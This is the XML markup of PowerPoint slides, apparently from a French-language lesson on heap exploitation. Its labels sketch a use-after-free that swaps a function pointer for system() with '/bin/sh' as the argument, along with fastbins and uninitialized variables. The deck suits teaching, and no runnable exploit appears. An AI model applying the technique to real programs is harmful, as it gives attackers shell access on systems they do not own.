            <a:ext cx="1442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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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7328" y="4797152"/>
            <a:ext cx="1442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3. new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3225094" y="4806444"/>
            <a:ext cx="1115616" cy="7172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green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1782190" y="4805594"/>
            <a:ext cx="1440160" cy="34804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name</a:t>
            </a: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1782189" y="5153643"/>
            <a:ext cx="1440160" cy="3720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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>print_red</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Connecteur en angle 19"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="0"/>
            <a:endCxn id="31" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3225786" y="1794079"/>
            <a:ext cx="264" cy="1441804"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -86590909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ngle 22"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="0"/>
            <a:endCxn id="54" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3230549" y="2890402"/>
            <a:ext cx="1" cy="1451070"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -2286000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en angle 24"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="16" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3142161" y="4165703"/>
            <a:ext cx="850" cy="1280632"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -26894118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23664" y="5839581"/>
            <a:ext cx="1442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4. new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36" name="Rectangle 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225094" y="5935125"/>
            <a:ext cx="1115616" cy="7172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green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37" name="Rectangle 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1782189" y="5935123"/>
            <a:ext cx="1440160" cy="34804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name</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rectangle 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1782188" y="6283173"/>
            <a:ext cx="1440160" cy="3691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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>print_red</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Connecteur en angle 38"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="37" idx="0"/>
            <a:endCxn id="36" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3142584" y="5294808"/>
            <a:ext cx="2" cy="1280633"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -1143000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4340710" y="5935123"/>
            <a:ext cx="1440160" cy="34804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name</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Rectangle 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4340709" y="6283173"/>
            <a:ext cx="1440160" cy="3691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790446" y="5935122"/>
            <a:ext cx="1276686" cy="71769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/bin/sh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E8E1BE-4321-44E7-8005-2BB5A625F933}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3226740" y="2515113"/>
            <a:ext cx="1440160" cy="34804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9B07BC-F18B-42F6-9980-55A9CAED3311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3226739" y="2863162"/>
            <a:ext cx="1440160" cy="3720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EADDBB5-ABB1-43C6-B232-4C2DED1E9D3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4671686" y="2515113"/>
            <a:ext cx="1440160" cy="34804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AE780D8-65C1-43F1-99FE-298017A5E772}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4671685" y="2863162"/>
            <a:ext cx="1440160" cy="3720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AE09B85-B193-483C-BB1A-0DB6B9A9A006}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6104094" y="2515114"/>
            <a:ext cx="1447838" cy="35043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6B0619A-DDB5-4F77-ADB0-D68F703B3CE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6104093" y="2865547"/>
            <a:ext cx="1447838" cy="3720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85A117D-969F-405A-8D44-8059F8667F2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7551935" y="2511279"/>
            <a:ext cx="1440160" cy="35624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3D04406-08F7-4D15-B167-AFAF4DDBEBF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7551934" y="2867526"/>
            <a:ext cx="1440160" cy="3720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D457021-26FA-4C57-BDE7-B6A61F807A41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8992094" y="2515113"/>
            <a:ext cx="1440160" cy="34804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9CC2DA1-8BDE-4C20-86D9-1C700594981B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8992093" y="2863162"/>
            <a:ext cx="1440160" cy="3720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51E99F5-4430-4A4E-9CEC-BB3C35A3611C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10425447" y="2515113"/>
            <a:ext cx="1096000" cy="34804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…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5BAED30-A2EE-4262-880B-90D864E2F9B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10425445" y="2863162"/>
            <a:ext cx="1095999" cy="3720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…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DF91889-7E13-4923-AE5D-F91E81AF7961}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3236005" y="3615938"/>
            <a:ext cx="1440160" cy="348048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46B7DC4-EC4C-4938-BEFD-5FAE5425B7E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3236004" y="3964781"/>
            <a:ext cx="1440160" cy="370385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7D5DF37-B47C-4746-8887-80195AAF4DFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4678521" y="3615936"/>
            <a:ext cx="1440160" cy="348051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BF5F30F-D194-4F6D-97BD-3FE90BDA40AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4680950" y="3967803"/>
            <a:ext cx="1440160" cy="367363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9EC3E29-498A-4C7D-A153-5AB6D603739F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6113359" y="3615935"/>
            <a:ext cx="1455518" cy="355292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248474C-A414-49B8-8553-93A9F8157AEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6113358" y="3977200"/>
            <a:ext cx="1455518" cy="357967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F9EDE88-8FA5-4851-BD28-0A6073C19B8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7568880" y="3617138"/>
            <a:ext cx="1440160" cy="354091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7634960-CB80-4C60-91AA-8025ED748B1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7568880" y="3971390"/>
            <a:ext cx="1440160" cy="361392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51524DC-A742-469E-BB33-8F2B2C240793}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9009040" y="3617100"/>
            <a:ext cx="1423213" cy="348049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CB53968-6FA9-4F51-B992-B9B40A35DDD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9009040" y="3974815"/>
            <a:ext cx="1416405" cy="357967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0C1A069-DC39-414A-840B-02FF3C58FDAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10434708" y="3617844"/>
            <a:ext cx="1096000" cy="348049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…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630DC9B-F0F6-4AAF-8933-60C98EE9560B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10434709" y="3963957"/>
            <a:ext cx="1095999" cy="372031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…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F77E7BD-5F07-4763-A3D1-DE6890239434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4350287" y="4806174"/>
            <a:ext cx="1440160" cy="348049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1E4B6D6-9537-494A-9D49-8573C86F0CC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4350286" y="5154223"/>
            <a:ext cx="1440160" cy="372031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6057EDF-F41B-4F1D-99CA-244257EA9386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5795233" y="4806174"/>
            <a:ext cx="1440160" cy="348049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D1CC42D-30E9-4167-8FAA-D641ED26E7F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5795232" y="5154223"/>
            <a:ext cx="1440160" cy="372031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8E8E0EA-121C-4745-B45C-ACAEB341AC4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7237512" y="4806174"/>
            <a:ext cx="1440160" cy="348049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C761A0A-8DC4-40ED-BE11-9C5305959225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7237511" y="5154223"/>
            <a:ext cx="1440160" cy="372031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CB6FED6-D4D6-4861-B335-91AFB1FDD608}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8683163" y="4806174"/>
            <a:ext cx="1440160" cy="348049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D74C639-37B6-44FE-8E0A-D8E882E50866}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8683162" y="5154223"/>
            <a:ext cx="1440160" cy="372031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7BC2AE1-24C3-4D1D-9792-6E8F2FA508F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10123321" y="4805594"/>
            <a:ext cx="1407387" cy="348049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…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790D25E-E237-4268-97F4-9E477A712AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10123321" y="5154222"/>
            <a:ext cx="1407388" cy="372031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…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55284A1-D1AD-45A6-95F1-14BE8467DCA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7076709" y="5935122"/>
            <a:ext cx="1440160" cy="335665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EBFE6AF-2F6E-4FB5-B936-B5665F4D670F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7076708" y="6270787"/>
            <a:ext cx="1440160" cy="381540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CCD6030-72CF-4882-881B-17F089B63565}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8521655" y="5935122"/>
            <a:ext cx="1440160" cy="335665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E923C98-66A2-4BC5-A685-E06AF1BE906B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8521654" y="6270787"/>
            <a:ext cx="1440160" cy="381540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8AA1C92-7AB5-4507-8982-2B793CB03097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9963933" y="5935122"/>
            <a:ext cx="1596725" cy="335665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BFF2E15-1E6B-477B-B4D9-0F1EA5EE9AF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9963932" y="6270787"/>
            <a:ext cx="1596725" cy="381540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&amp;system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="45" name="Connecteur en angle 44"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="41" idx="0"/>
            <a:endCxn id="43" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5744789" y="5251124"/>
            <a:ext cx="1" cy="1367999"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2286010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Flèche : chevron 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A273245-9A10-4150-A5BD-962D37906C43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5" name="Flèche : chevron 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D110D560-EEEA-4B36-9D43-DA3FFCB6F7F7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84" name="Flèche : chevron 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E88EA60-972E-43DA-8E26-F339F3697CF2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5" name="Flèche : chevron 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27716825-17E3-48BC-B240-D35917CEA0A2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6" name="Flèche : chevron 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EB10E49-8CE6-4867-B790-7046ABBC84C0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87" name="Flèche : chevron 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9154316B-12E0-4F1D-ABCF-8DE56826C653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293831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  <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="35" grpId="0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243D02-01BA-47F3-AE19-7352851D9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Uninitialized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> variable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A423179-71CF-45B0-965B-D893B4CFC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714" y="1939369"/>
            <a:ext cx="3920571" cy="23311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CC0C3EC-40EF-42DF-AF00-E0FB431F6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125" y="4270520"/>
            <a:ext cx="5731748" cy="2331151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Flèche : chevron 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED5F4A81-960F-4EFE-9A48-5FCA46DF9AA2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Flèche : chevron 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{863B2604-AF34-474B-83D7-5E86AC8B00CA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868AAB70-57CF-48B3-99DC-83D522886271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7CC6633E-560E-48B2-9257-E8F1FA14A48C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4B34079A-9018-488D-BCA6-BAC4C9E07A4E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12" name="Flèche : chevron 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C803D9F9-121C-4B7D-931D-546F970FC4D7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1568911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243D02-01BA-47F3-AE19-7352851D9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Uninitialized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> variable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291AD4-227C-4D4A-AC0B-AD5945478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62" y="4288776"/>
            <a:ext cx="11736915" cy="20186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423179-71CF-45B0-965B-D893B4CFC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714" y="1939369"/>
            <a:ext cx="3920571" cy="2331151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Flèche : chevron 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{760271BF-8371-4632-BB98-D3C714C2F54B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Flèche : chevron 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB4EC68F-0FEA-4A06-B1A9-2D900F22B9C9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BCFC323F-723E-4F6F-912B-55BBB81A13B2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82A4178F-79B6-4109-B7A9-0A444428F8C5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B1D0FE9E-1765-4345-A4FB-FC5269F50134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12" name="Flèche : chevron 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33232B12-65BE-446A-B8D7-A311A02E146D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3234220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DAB388-7168-4960-A07C-8A09E3EB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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Fastbins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16368B-C8F3-44F4-8149-E4566A1AE1FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579477" y="3429000"/>
            <a:ext cx="18002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D38B6B-071C-4CEE-9565-6C0092F2FA37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579477" y="3861048"/>
            <a:ext cx="18002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7CFC661-8052-42E4-8A47-FBBDBD696B0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571365" y="3429000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 : 0x10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8F60422-C287-465F-BDF5-A2B725F13870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571365" y="3892406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: 0x20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3574293-AC5A-4BFD-933A-7C2BF7C97375}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606861" y="4393704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9B170D-A569-4CDE-A946-C9FB473AD091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4947752" y="3331860"/>
            <a:ext cx="396044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B859D2-B103-4B96-A9C5-E4102114B1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4947752" y="4795672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80CEE0D5-897A-48F0-A4FE-18C84FEB79A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="34" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3379677" y="3645024"/>
            <a:ext cx="1177054" cy="119624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 : en angle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97DC3638-B824-423E-937D-F3F3583A8D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="3"/>
            <a:endCxn id="40" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3379677" y="4077072"/>
            <a:ext cx="1172031" cy="1151388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82DFA23-7A73-4846-B702-C48CE1B450A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343796" y="3331860"/>
            <a:ext cx="1400001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A49375A-E481-4347-9402-279798531557}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8857309" y="3331860"/>
            <a:ext cx="396044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830778D-409A-40E8-A150-D96109C874C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9253353" y="3331860"/>
            <a:ext cx="1400001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 : en angle 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C9B0923-776B-4598-A6FF-3827A870FA33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="0"/>
            <a:endCxn id="36" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6594741" y="1882893"/>
            <a:ext cx="432788" cy="3330723"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -52820"/>
              <a:gd name="adj2" fmla="val 72367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1CC2031D-65AF-4AB0-B61E-6DC8BC81EF9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343796" y="4795672"/>
            <a:ext cx="3876572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6147BB0-D154-430B-A67C-B611DD634689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4556731" y="3331860"/>
            <a:ext cx="396044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F263045-42F6-400A-8048-3EDF149A29E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8476497" y="3331860"/>
            <a:ext cx="396044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1DB1DD5-2408-47C8-9876-B20003BB345A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551708" y="4795672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FCAAA752-5940-4930-B765-F5E03B4E11DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551708" y="4303567"/>
            <a:ext cx="2196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F83A72AC-7AB9-4A4C-B2FF-634971CF0285}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8476497" y="4298658"/>
            <a:ext cx="2196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336D1C29-B644-4D71-8719-7DEF234F5CE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551708" y="5805264"/>
            <a:ext cx="46686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1E112C08-0C2B-4DCC-A05D-57628E975477}"/>
              </a:ext>
            </a:extLst>
